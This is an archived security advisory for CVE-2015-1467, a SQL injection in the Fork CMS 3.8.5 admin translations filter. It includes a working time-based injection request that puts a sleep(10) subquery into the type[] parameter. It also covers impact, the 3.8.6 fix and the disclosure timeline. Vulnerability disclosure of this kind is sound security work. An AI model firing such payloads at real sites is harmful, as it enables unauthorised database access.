exploit the possibilities

Fork CMS 3.8.5 SQL Injection

Fork CMS 3.8.5 SQL Injection
Posted Feb 4, 2015
Authored by Sven Schleier

Fork CMS version 3.8.5 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2015-1467
MD5 | d565ec07f448d71c95d88f93d531b46d

Fork CMS 3.8.5 SQL Injection

Change Mirror Download
[CVE-2015-1467] Fork CMS - SQL Injection in Version 3.8.5

----------------------------------------------------------------

Product Information:

Software: Fork CMS

Tested Version: 3.8.5, released on Wednesday 14 January 2015

Vulnerability Type: SQL Injection (CWE-89)

Download link to tested version: http://www.fork-cms.com/download?release=3.8.5

Description: Fork CMS is dedicated to creating a user friendly environment to build, monitor and update your website. We take great pride in being the Content Management System of choice for beginners and professionals. We combine this grand vision with the latest technological innovations to allow developers, front-end developers and designers to build kick-ass websites. This makes Fork CMS next in line for world domination. (copied from http://www.fork-cms.com/features)

----------------------------------------------------------------

Vulnerability description:

When an authenticated user is navigating to "Settings/Translations" and is clicking on the button "Update Filter" the following GET-request is sent to the server:

http://127.0.0.1/private/en/locale/index?form=filter&form_token=408d28a8cbab7890c11b20af033c486b&application=&module=&type%5B%5D=act&type%5B%5D=err&type%5B%5D=lbl&type%5B%5D=msg&language%5B%5D=en&name=&value=


The parameter language[] is prone to boolean-based blind and stacked queries SQL-Injection. WIth the following payload a delay can be provoked in the request of additional 10 seconds:

http://127.0.0.1/private/en/locale/index?form=filter&form_token=68aa8d273e0bd95a70e67372841603d5&application=&module=&type%5B%5D=act%27%2b(select%20*%20from%20(select(sleep(10)))a)%2b%27&type%5B%5D=err&type%5B%5D=lbl&type%5B%5D=msg&language%5B%5D=en&name=&value=

Also the parameters type[] are prone to SQL-Injection.

----------------------------------------------------------------

Impact:

Direct database access is possible if an attacker is exploiting the SQL Injection vulnerability.

----------------------------------------------------------------

Solution:

Update to the latest version, which is 3.8.6, see http://www.fork-cms.com/download.

----------------------------------------------------------------

Timeline:

Vulnerability found: 3.2.2015
Vendor informed: 3.2.2015
Response by vendor: 3.2.2015
Fix by vendor 3.2.2015
Public Advisory: 4.2.2015

----------------------------------------------------------------

Best regards,

Sven Schleier

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

January 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    8 Files
  • 2
    Jan 2nd
    11 Files
  • 3
    Jan 3rd
    11 Files
  • 4
    Jan 4th
    2 Files
  • 5
    Jan 5th
    2 Files
  • 6
    Jan 6th
    18 Files
  • 7
    Jan 7th
    15 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    10 Files
  • 10
    Jan 10th
    13 Files
  • 11
    Jan 11th
    2 Files
  • 12
    Jan 12th
    4 Files
  • 13
    Jan 13th
    21 Files
  • 14
    Jan 14th
    18 Files
  • 15
    Jan 15th
    12 Files
  • 16
    Jan 16th
    18 Files
  • 17
    Jan 17th
    11 Files
  • 18
    Jan 18th
    3 Files
  • 19
    Jan 19th
    2 Files
  • 20
    Jan 20th
    15 Files
  • 21
    Jan 21st
    21 Files
  • 22
    Jan 22nd
    19 Files
  • 23
    Jan 23rd
    19 Files
  • 24
    Jan 24th
    11 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close